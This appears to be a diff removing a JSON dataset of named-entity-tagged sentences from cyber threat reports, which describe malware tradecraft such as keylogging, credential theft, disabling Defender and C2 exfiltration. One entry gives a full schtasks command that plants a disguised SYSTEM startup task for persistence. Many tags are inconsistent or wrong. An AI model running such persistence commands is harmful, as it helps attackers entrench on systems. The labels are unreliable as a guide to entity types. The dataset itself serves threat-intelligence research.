"URI", - "is", - "composed", - "using", - "a", - "set", - "of", - "hardcoded", - "keywords", - "and", - "paths,", - "which", - "are", - "chosen", - "partly", - "at", - "random", - "and", - "partly", - "based", - "on", - "the", - "type", - "of", - "HTTP", - "request", - "that", - "is", - "being", - "sent", - "out." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DeleteFile" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "deleting", - "files" - ], - "ner_tags": [ - "B-SamFile", - "B-Features" - ] - }, - { - "tokens": [ - "ReadRegistryValue" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "GetRegistrySubKeyAndValueNames" - ], - "ner_tags": [ - "B-Way" - ] - }, - { - "tokens": [ - "enumerate", - "files", - "and", - "registry", - "keys" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "content", - "of", - "the", - "MachineGuid", - "registry", - "value", - "from", - "the", - "key", - "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DeleteRegistryValue" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "SetRegistryValue" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "manipulating", - "of", - "registry", - "keys" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GetProcessByDescription" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "enumerate", - "processes" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "command", - "CollectSystemDescription", - "retrieves", - "the", - "following", - "information:", - "Local", - "Computer", - "Domain", - "name", - "Administrator", - "Account", - "SID", - "HostName" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OS", - "Version" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "domain", - "name", - "of", - "the", - "device" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Username" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "System", - "Directory" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "avoid", - "detection,", - "attackers", - "renamed", - "Windows", - "administrative", - "tools", - "like", - "adfind.exe", - "which", - "were", - "then", - "used", - "for", - "domain", - "enumeration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "schtasks", - "/create", - "/F", - "/tn", - "“\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager”", - "/tr", - "“C:\\Windows\\SoftwareDistribution\\EventCacheManager.exe”", - "/sc", - "ONSTART", - "/ru", - "system", - "/" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "With", - "Rundll32," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "collect", - "and", - "upload", - "information", - "about", - "the", - "device" - ], - "ner_tags": [ - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "report", - "some", - "basic", - "information", - "about", - "the", - "compromised", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "ability", - "to", - "log", - "keystrokes" - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "keystrokes" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "logs", - "keystrokes" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "capture", - "screenshots," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "“The", - "reconnaissance", - "data", - "is", - "exfiltrated", - "to", - "the", - "attacker-controlled", - "server", - "through", - "an", - "HTTP", - "POST", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "attacker-controlled", - "server", - "through", - "an", - "HTTP", - "POST", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "send", - "phishing", - "emails", - "with", - "malicious", - "HTML", - "attachments" - ], - "ner_tags": [ - "O", - "B-Way", - "I-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "operating", - "system", - "information" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collecting", - "system", - "information", - "such", - "as", - "hostnames" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OS", - "version", - "information" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "run", - "the", - "payloads", - "by", - "sideloading", - "them", - "to", - "the", - "legitimate", - "executables" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "insights", - "on", - "anti-virus", - "software", - "present", - "on", - "the", - "machine" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloading", - "and", - "executing", - "two", - "other", - "PowerShell", - "scripts", - "from", - "a", - "different", - "attacker-controlled", - "server" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "IPv4", - "addresses" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "“The", - "banking", - "trojan", - "targets", - "the", - "victim’s", - "sensitive", - "information" - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "user", - "credentials", - "have", - "been", - "compromised,", - "this", - "tool", - "takes", - "“full", - "control”", - "of", - "the", - "account" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "“When", - "a", - "victim", - "opens", - "the", - "HTML", - "file", - "attachment,", - "an", - "embedded", - "URL", - "is", - "launched", - "in", - "the", - "victim’s", - "browser,", - "redirecting", - "to", - "another", - "malicious", - "HTML", - "file", - "from", - "an", - "attacker-controlled", - "AWS", - "EC2", - "instance" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Identify", - "processes" - ], - "ner_tags": [ - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Logged", - "Processes" - ], - "ner_tags": [ - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Identify", - "processes", - "related", - "to", - "backups,", - "antivirus/anti-spyware," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "actors", - "have", - "also", - "gained", - "initial", - "access", - "to", - "victim", - "networks", - "by", - "distributing", - "phishing", - "emails", - "with", - "malicious", - "attachments" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "exploiting", - "the", - "following", - "vulnerabilities", - "against", - "Microsoft", - "Exchange", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "removes", - "virus", - "definitions", - "and", - "disables", - "all", - "portions", - "of", - "Windows", - "Defender", - "and", - "other", - "common", - "antivirus", - "programs", - "in", - "the", - "system", - "registry" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Microsoft", - "Windows", - "Defender", - "AntiVirus", - "Protection", - "disabled" - ], - "ner_tags": [ - "O", - "O", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Microsoft", - "Windows", - "Defender", - "AntiSpyware", - "Protection", - "disabled" - ], - "ner_tags": [ - "O", - "O", - "I-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Microsoft", - "Exchange", - "Server", - "Privilege", - "Escalation", - "Vulnerability" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Exp" - ] - }, - { - "tokens": [ - "remove", - "all", - "existing", - "shadow", - "copies", - "via", - "vssadmin", - "on", - "command", - "line" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "could", - "cause", - "the", - "file", - "to", - "run", - "when", - "double-clicked", - "instead", - "of", - "opening", - "it", - "with", - "a", - "PDF", - "viewer." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "and", - "then", - "downloads", - "a", - "second-stage", - "backdoor", - "from", - "the", - "OpenDrive", - "cloud", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decryption", - "routine", - "shared", - "between", - "the", - "BADCALL", - "for", - "Linux", - "and", - "targeted", - "destructive", - "malware", - "for", - "Windows", - "from", - "2014" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "uses", - "the", - "same", - "type", - "of", - "strong", - "encryption", - "–", - "AES-GCM" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "creates", - "a", - "scheduled", - "task", - "on", - "the", - "system", - "that", - "provides", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "a", - "scheduled", - "task", - "on", - "the", - "system", - "that", - "provides", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "a", - "scheduled", - "task", - "on", - "the", - "system", - "that", - "provides", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "establishes", - "persistence", - "by", - "creating", - "an", - "autostart", - "service", - "that", - "allows", - "it", - "to", - "run", - "whenever", - "the", - "machine", - "boots." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "establishes", - "persistence", - "by", - "creating", - "an", - "autostart", - "service", - "that", - "allows", - "it", - "to", - "run", - "whenever", - "the", - "machine", - "boots." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decodes", - "the", - "configuration", - "data", - "and", - "modules." - ], - "ner_tags": [ - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "into", - "the", - "svchost.exe", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "injects", - "into", - "the", - "svchost.exe", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "malicious", - "actors", - "spread", - "primarily", - "by", - "spearphishing", - "campaigns", - "using", - "tailored", - "emails", - "that", - "contain", - "malicious", - "attachments" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "used", - "an", - "email", - "with", - "an", - "Excel", - "sheet", - "containing", - "a", - "malicious", - "macro", - "to", - "deploy", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "compromised", - "server", - "that", - "prompts", - "the", - "victim", - "to", - "click" - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "clicking", - "the", - "photo,", - "the", - "victim", - "unknowingly", - "downloads", - "a", - "malicious", - "JavaScript", - "file", - "that" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "has", - "attempted", - "to", - "get", - "users", - "to", - "launch", - "malicious", - "documents", - "to", - "deliver", - "its", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "spread", - "the", - "malware", - "laterally", - "across", - "a", - "network", - "by", - "abusing", - "the", - "Server", - "Message", - "Block", - "(SMB)", - "Protocol." - ], - "ner_tags": [ - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "modules", - "spread", - "the", - "malware", - "laterally", - "across", - "a", - "network", - "by", - "abusing", - "the", - "SMB", - "Protocol." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "data", - "exfiltration", - "over", - "a", - "hardcoded", - "C2", - "server" - ], - "ner_tags": [ - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "send", - "information", - "about", - "the", - "compromised", - "host", - "to", - "a", - "hardcoded", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "the", - "Windows", - "Application", - "Programming", - "Interface", - "(API)", - "call,", - "CreateProcessW(),", - "to", - "manage", - "execution", - "flow." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "by", - "capturing", - "the", - "CredEnumerateA", - "API." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "capturing", - "the", - "CredEnumerateA", - "API." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "leveraging", - "Microsoft’s", - "CryptoAPI" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "an", - "AES", - "CBC", - "(256", - "bits)", - "encryption", - "algorithm", - "for", - "its", - "loader", - "and", - "configuration", - "files." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "leverages", - "a", - "custom", - "packer", - "to", - "obfuscate", - "its", - "functionality." - ], - "ner_tags": [ - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "modify", - "registry", - "entries" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "disable", - "Windows", - "Defender." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "can", - "obtain", - "passwords", - "stored", - "in", - "files", - "from", - "several", - "applications", - "such", - "as", - "Outlook,", - "Filezilla,", - "OpenSSH,", - "OpenVPN", - "and", - "WinSCP." - ], - "ner_tags": [ - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "it", - "searches", - "for", - "the", - ".vnc.lnk", - "affix", - "to", - "steal", - "VNC", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "can", - "obtain", - "passwords", - "stored", - "in", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "querying", - "the", - "Software\\SimonTatham\\Putty\\Sessions", - "registry", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obtains", - "the", - "IP", - "address,", - "location,", - "and", - "other", - "relevant", - "network", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "identify", - "the", - "user", - "and", - "groups", - "the", - "user", - "belongs", - "to", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gathers", - "the", - "OS", - "version,", - "machine", - "name,", - "CPU", - "type,", - "amount", - "of", - "RAM", - "available", - "from", - "the", - "victim’s", - "machine" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "searches", - "the", - "system", - "for", - "all", - "of", - "the", - "following", - "file", - "extensions:", - ".avi,", - ".mov,", - ".mkv,", - ".mpeg,", - ".mpeg4,", - ".mp4,", - ".mp3,", - ".wav,", - ".ogg,", - ".jpeg,", - ".jpg,", - ".png,", - ".bmp,", - ".gif,", - ".tiff,", - ".ico,", - ".xlsx,", - "and", - ".zip." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "collects", - "local", - "files", - "and", - "information", - "from", - "the", - "victim’s", - "local", - "machine." - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "HTTPS", - "to", - "communicate", - "with", - "its", - "C2", - "servers" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "samples", - "have", - "used", - "HTTP", - "over", - "ports", - "447", - "and", - "8082", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "several", - "additional", - "files", - "and", - "saves", - "them", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "a", - "custom", - "crypter", - "leveraging", - "Microsoft’s", - "CryptoAPI", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features" - ] - } -] \ No newline at end of file